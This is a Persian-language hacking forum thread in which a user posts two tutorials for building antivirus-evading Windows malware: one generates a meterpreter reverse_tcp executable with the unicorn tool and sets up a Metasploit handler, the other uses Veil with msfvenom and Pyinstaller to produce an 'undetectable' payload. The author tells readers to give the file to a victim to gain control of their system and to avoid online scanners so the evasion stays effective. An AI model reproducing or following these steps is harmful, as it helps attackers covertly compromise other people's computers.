alizombie ارسال شده در سِپتامبر 29 2015 گزارش اشتراک گذاری ارسال شده در سِپتامبر 29 2015 با سلام خدمت شما دوستان گرامی من تازه کار با کالی رو شروع کردم ولی باید بگم که os فوق العاده ای هستش و پیشنهاد میکنم که همه نصب کنند و از ان استفاده کنید(ضرر نمیکنید.... This is the hidden content, please ورود یا ثبت نام /emoticons/biggrin@2x.png 2x" width="20" height="20" /> ) خب بهتره از اصل اموزش دور نشیم در این آموزش با استفاده از ابزار unicorn در کالی لینوکس انتی ویروس رو دور میزنیم و فایلی درست میکنیم که هیچ انتی ویروسی نشناسه This is the hidden content, please ورود یا ثبت نام ابتدا وارد terminal میشیم و دستور زیر رو میزنیم unicorn.sh -h نکته اگر در دسکتاپ این فایل رو دارید باید ابتدا دستور زیر رو بزنید ( در اخر فایل رو ضمیمه میکنم) cd Desktop خب و بعد دستور زیر رو میزنیم unicorn.sh windows/meterpreter/reverse_tcp ipkhodeton portdelkho nonuac و بعد از چند ثانیه 3 تا فایل براتون درست میشه اونی که اسمش ( unicorn.c رو leafpad یا هر چی دیگه باز کنید و کد های داخل شو copy کرده و سایت زیر رو باز کنید و در کادر paste کنید http://www.onlinecompiler.net/ccplusplus خب و حالا گزینه کامپایل رو بزنید و فایلی که بهتون داده رو دانلود کنید مثل زیر Link to executable file: iHG8J98c.exe خب بعد از دانلود فایل دستورات زیر رو اجرا کنید فایلتون هم میتونید در سایت زیر اسکن کنید https://virusscan.jotti.org msfconsole بعد از وارد شدن به محیط متااسپلویت دستورات معروف زیر رو بزنیدuse exploit/multi/handlerset LHOST ....set LPORT ....set PAYLOAD windows/meterpreter/reverse_tcpexploit اینم لینک اسکن This is the hidden content, please ورود یا ثبت نام و حالا فایل رو بدید به قربانی تا اجرا کنه وقتی که اجرا کرد شما به سیستم قربانی وصل میشید فایل رو هم براتون پیوست کردم البته روش های دیگری هم برای کریپت کردن یک ویروس وجود دارد که در ادامه ی همین تاپیک برای شما ضمیمه میکنم..... This is the hidden content, please ورود یا ثبت نام تشکر هم فراموش نشود هر چه استقبال ها بیشتر باشداموزش و روش هایی جدید تر و بهتررا به شما یاد خواهم داد با تشکر This is the hidden content, please ورود یا ثبت نام This is the hidden content, please ورود یا ثبت نام واکنش ها : behrouz1993، danix-z، aliakbari و 12 نفر دیگر 15 لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
alizombie ارسال شده در اُکتُبر 11 2015 نویسنده گزارش اشتراک گذاری ارسال شده در اُکتُبر 11 2015 چگونگی کریپت کردن ویروس با کالی لینوکس با سلام خدمت شما دوستان گرامی خیلی از دوستان از من میپرسند که چگونه میتوانند ویروس خود را به گونه ای کریپت کنند که انتی ویروس های معمولی (مثلا نود 32 )رابایپس کند.... This is the hidden content, please ورود یا ثبت نام /emoticons/biggrin@2x.png 2x" width="20" height="20" /> خب یکی از ابزار های محشر کالی لینوکس که فقط مخصوص این سیستم عامل است ابزار veil نام دارد که این ابزار توانایی : 1_دور زدن انتی ویروس های معمول 2_گرفتن payload از metasploit و گرفتن نسخه ی جدید ان در زمانی که روانه ی بازار میشود 3_توانایی ساختن payload های متفاوت تا جایی که امکان دارد و........ چند وقت پیش ورژن (2.0.4)این ابزار منتشر شد که توانایی سازگاری با هر دو نسخه ی 32 و 64 بیتی میباشد که این خود یک خبر خوب است اگر میخواهید این ابزار را در درون سیستم حودتان نصب کنید کافی است که دستورات زیر را در کامند لاین تایپ کنید apt-get updateapt-get install veil و یا از راه حل دوم در زیر برای نصب اقدام کنید wget This is the hidden content, please ورود یا ثبت نام unzip master.zipcd Veil-master/setupcd .../setup.sh من در زمان نصب با راه حل به مشکل برخوردم و به شما راه حل دوم را پیشنهاد میکنم This is the hidden content, please ورود یا ثبت نام دوستان عزیز این را بدانید که اسکنر های انلاین این را میدانند که 90 درصد اوقات ویروس نویس ها هستند که ویروس های خود را در انتی ویروس های انلاین اسکن میکنند و بعد از انکه ویروس شما توسط این اسکنر ها fud نشانداده شد فایل شما را (همان ویروس را) به قیمتی گزاف به این شرکت های انتی ویروس ها میفروشند از از این راه کسب درامد مفتی میکنند...... و بعد از این که ویروس شما و روش کریپتینگ شما به تاریخ پیوست میشینند و به ریش ما میخنددند پس لطفا اگر یه وقتی با این روش ویروس خود را کریپت کردین با انتی ویروس های انلاین انرا اسکن نکنید(ازشما دوستان گرامی عاجزانه خواهش میکنم که ویروس خود را در انتی ویروس های انلاین اسکن نکنید و اینرا هم بدانید که اگر که مشاهده کنم که این روش هم مانند خیلی از روش های دیگر از بین رفت این را بدانید که دیگر هیچگونهروش کریپتینگ چه نرم افزار و چه روش هایی دیگر را در انجمن ضمیمه نمیکنم و دیگر خودتان باید به دنبال روش برای انجام این کار باشد پس لطفا هواستون رو در مورد کار با این ابزار ها جمع کنید........ This is the hidden content, please ورود یا ثبت نام /emoticons/sleep@2x.png 2x" width="20" height="20" /> اگر که میخواهید برای فود بودن از ویروس خودتون مطمئن باشید کافیست که به ادرس nodistribute.com مراجعه کرده و بعد از اسکن گزینه ی"Do not distribute the sample". را در اختیار شما میگزارد که میتوانید از انها استفاده کنید........ This is the hidden content, please ورود یا ثبت نام /emoticons/biggrin@2x.png 2x" width="20" height="20" /> خب به سراغ اموزش میرویم: اگر که ابزار را به تازگی نصب کرده اید میتوانید به راحتی با زدن فرمان زیر انرا اجرا کنید ./Veil در حالت معمول بعد از باز کردن ان شما 18 عدد payload اماده برای استفاده دارید که با زدن فرمان USE میتوانید از ان استفاده کنید This is the hidden content, please ورود یا ثبت نام درتصویر زیر ابزار veil اطلاعات بیشتری به ما میدهد که من به شما توصیه میکنم که ازpython/b64VirtualAlloc استفاده کنید که با تایپ عدد 18 میتوانید از ان استفاده کنید This is the hidden content, please ورود یا ثبت نام زمانی که payload شما اماده است دستور generate را تایپ کنید شما گزینه های دیگری نیز در ابزار میبینید ولی ما بعدا به ان گزینه ها میپردازیم و الان ما گزینه معمول را انتخاب میکنیم This is the hidden content, please ورود یا ثبت نام حال ما با تایپ عدد 1 گزینه ی msfvenom را انتخاب میکنیم This is the hidden content, please ورود یا ثبت نام حال ما باید کمی از جزئیات را در زیر تایپ کنیم Enter metasploit payload: "windows/meterpreter/reverse_tcp" وارد کردن payload متااکسپلویت Enter value for 'LHOST', [tab] for local IP: "192.168.69.69" وارد کرد ایپی defult خودتون در اینجا Enter value for 'LPORT': "443" وارد کردن پورت مورد نظرتون حال باید کمی صبر کنید تا شل کود مورد نظرتون ساخته شود This is the hidden content, please ورود یا ثبت نام حال بعد از زدن کلید enter باید یک نام برای payload مورد نظر انتخاب کنیم که در اینجا من undetectable را انتخاب میکنم This is the hidden content, please ورود یا ثبت نام حال ما با تایپ کلید 1 گزینه ی Pyinstaller را انتخاب میکنیم که یک فایل اجرایی برای ما میسازد This is the hidden content, please ورود یا ثبت نام در اخر هم ما میتوانیم فایل ویروسیمان را در مسیر " /root/Veil-master/output/compiled/" پیدا کنیم This is the hidden content, please ورود یا ثبت نام خب حالا وقت به اسکن فایل رسیده است ..... This is the hidden content, please ورود یا ثبت نام /emoticons/biggrin@2x.png 2x" width="20" height="20" /> This is the hidden content, please ورود یا ثبت نام خب در تصویر زیر میبینید که کاملا fud است (درسته که لینک اسکن قدیمی هستس ولی اینرو بدونید که این ابزار هر چند وقت یکبار اپدیت میشود و تا وقتی که در اسکنر انلاین اسکن نشود کاملا fud باقی میماند...... This is the hidden content, please ورود یا ثبت نام This is the hidden content, please ورود یا ثبت نام تشکر هم فراموش نشود هر چه استقبال ها بیشتر باشداموزش و روش هایی جدید تر و بهتررا به شما یاد خواهم داد (به شرط لو نرفتنا....... This is the hidden content, please ورود یا ثبت نام /emoticons/tongue@2x.png 2x" width="20" height="20" />) با تشکر This is the hidden content, please ورود یا ثبت نام واکنش ها : RT3N، MRDark، R3dC0d3r و 6 نفر دیگر 8 1 لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
Vendetta ارسال شده در مِی 8 2016 گزارش اشتراک گذاری ارسال شده در مِی 8 2016 سلام خسته نباشی بخاطر تاپیک خوبت من دستور بعد از گیت هاب رو که میزنم ارور که نتونست فایل زیپ رو پیدا کنه میشه لطفا راهنماییم کنی؟ واکنش ها : johnjones 1 لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
armanbabaei ارسال شده در اُکتُبر 26 2018 گزارش اشتراک گذاری ارسال شده در اُکتُبر 26 2018 سلام روش اول شمارو همه انتی ویروس ها میشناسن حتا انتی ویروس nod-32 واکنش ها : johnjones 1 لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
RT3N ارسال شده در اُکتُبر 27 2018 گزارش اشتراک گذاری ارسال شده در اُکتُبر 27 2018 درود/ دوست عزیز تاپیک سال 94 رو بالا اوردید انتظار دارید شناسایی نکنه!!!! لطفا تاپیک های قدیمی رو بالا نیارید. اگر درخواست باشه این بخش بروز رسانی میشه. یا حق. واکنش ها : johnjones و alizombie 2 لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
پست های پیشنهاد شده